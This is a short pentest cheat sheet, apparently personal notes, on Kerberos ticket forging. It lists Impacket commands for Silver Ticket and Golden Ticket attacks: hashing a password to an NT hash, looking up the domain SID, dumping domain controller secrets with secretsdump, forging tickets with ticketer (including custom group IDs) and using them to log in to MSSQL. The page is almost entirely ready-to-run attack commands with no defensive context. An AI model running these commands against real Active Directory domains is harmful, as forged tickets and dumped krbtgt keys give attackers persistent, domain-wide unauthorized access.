1.0 Ticket Based Attacks

1.1 Silver Ticket

iconv -f ASCII -t UTF-16LE <(printf "$pass") | openssl dgst -md4
 
impacket-lookupsid '$domain.local/$user:$pass@evergreen' 0
 
impacket-ticketer -nthash "84a5092...52b93b804" -domain-sid "S-1-5-21-..." -domain "$domain.local" -spn "MSSQLSvc/$server.$domain.local" "$user" -user-id 1119
 
export KRB5CCNAME=$user.ccache
 
impacket-mssqlclient '@$server.$domain.local' -k -no-pass -debug -target-ip 172.17.1.22 -windows-auth

1.2 Golden Ticket

impacket-secretsdump '$domain.local/$user:$pass@$dc.$domain.local' -just-dc
impacket-ticketer -aesKey be43fd55ab73801ae4136810d5c9c757 -domain-sid "S-1-5-21-..." -domain "$domain.local" "$user" -user-id 1114

Hints

# Find the domain SID
lookupsid.py -hashes 'LMhash:NThash' 'DOMAIN/DomainUser@DomainController' 0
 
# Create the golden ticket (with RC4 key, i.e. NT hash)
ticketer.py -nthash "$krbtgtNThash" -domain-sid "$domainSID" -domain "$DOMAIN" "randomuser"
 
# Create the golden ticket (with AES 128/256bits key)
ticketer.py -aesKey "$krbtgtAESkey" -domain-sid "$domainSID" -domain "$DOMAIN" "randomuser"
 
# Create the golden ticket (with RC4 key, i.e. NT hash) with custom user/groups ids
ticketer.py -nthash "$krbtgtNThash" -domain-sid "$domainSID" -domain "$DOMAIN" -user-id "$USERID" -groups "$GROUPID1,$GROUPID2,..." "randomuser"

References

Link

hckhsn

Explorer

Ticket Based Attacks

1.0 Ticket Based Attacks

1.1 Silver Ticket

1.2 Golden Ticket

Hints

References

Graphansicht

Inhaltsverzeichnis